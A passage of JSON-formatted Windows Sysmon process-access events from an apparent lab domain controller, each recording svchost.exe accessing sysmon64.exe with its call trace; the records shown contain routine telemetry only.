05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1385,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1386,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1387,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1388,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1389,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1390,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1391,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1392,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 